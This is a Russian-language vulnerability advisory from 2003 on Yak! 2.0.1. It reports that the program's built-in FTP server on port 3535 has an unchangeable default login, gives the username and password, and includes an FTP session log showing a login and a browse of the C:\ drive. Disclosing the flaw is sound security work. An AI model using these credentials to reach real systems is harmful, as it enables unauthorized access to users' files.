Дата публикации: | 17.09.2003 |
Всего просмотров: | 1509 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Yak! 2.0.1
Описание: Уязвимость обнаружена в Yak!. Удаленный атакующий может получить доступ к уязвимой системе. Удаленный атакующий может подключиться к встроенному FTP серверу на 3535 порту, используя имя пользователя и пароль по умолчанию (username : Yak, password : asd123). Имя пользователя и пароль не могут быть изменены.
Пример/Эксплоит: ftp> open localhost 3535 Connected to desktop. 220 ICS FTP Server ready. User (desktop:(none)): Yak 331 Password required for Yak. Password: 230 User Yak logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. C:\TEMP\*.* not found 226 File sent ok ftp: 23 bytes received in 0.01Seconds 1.53Kbytes/sec. ftp> cd .. 250 CWD command successful. "C:/" is current directory. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. -rw-rw-rw- 1 ftp ftp 0 Aug 07 19:58 CONFIG.SYS -rwxrwxrwx 1 ftp ftp 0 Aug 07 19:58 AUTOEXEC.BAT drw-rw-rw- 1 ftp ftp 0 Sep 08 00:42 yak201 -r--r--r-- 1 ftp ftp 783764060 Sep 04 01:05 AVSEQ00.DAT -r--r--r-- 1 ftp ftp 793687148 Sep 04 02:27 AVSEQ01.DAT -rw-rw-rw- 1 ftp ftp 217 Sep 09 11:53 bil.reg drw-rw-rw- 1 ftp ftp 0 Aug 07 21:03 Program Files drw-rw-rw- 1 ftp ftp 0 Aug 09 01:39 test drw-rw-rw- 1 ftp ftp 0 Aug 30 10:17 Norton AntiVirus 226 File sent ok ftp: 594 bytes received in 0.00Seconds 594000.00Kbytes/sec. ftp> URL производителя:http://www.digicraft.com.au/yak/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Yak! 2.0.1 file trasfer exploit |